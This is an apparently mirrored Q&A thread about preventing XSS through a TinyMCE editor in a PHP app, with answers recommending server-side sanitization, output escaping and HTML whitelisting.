TinyMCE security question: how to prevent malicious input?

Question

TinyMCE security question: how to prevent malicious input?

How to prevent malicious input in WYSIWYG editors like TinyMCE?

I have a system with users who are not “technical skills” (therefore no WMD) and need a rich text editor that places its content in a database.

I am worried about script attacks and malicious input codes.

+7

javascript security php tinymce codeigniter

Walker Jun 15 '10 at 21:00

source share

3 answers

You cannot prevent client input. You can add things to interfere (or try), but it will always be trivial to send malicious code. You NEED to sanitize in PHP.

ALWAYS ALWAYS ALWAYS avoid user-submitted content before displaying it ( htmlentities will usually take care of this for you).

If you want to have an HTML message (as you say, you want WYSIWYG), you need the whitelist to clear the HTML that was sent. When I say whitelist, I mean both the tag name and the attribute.

I am not familiar with CodeIgniter, but found this one that looks like it can do what you want ...

0

ircmaxell Jun 15 '10 at 21:06

source share

Use the jQuery Validation Plugin

-4

Srikar doddi Jun 15 '10 at 21:04

source share

rook · Accepted Answer · 2010-06-15T21:21:40+0000

If you only need secure html, you should use an HTML cleaner . If you want to protect against XSS and block all html, you should use $var=htmlspcialchars($var,ENT_QUOTES);

TinyMCE security question: how to prevent malicious input?

More articles: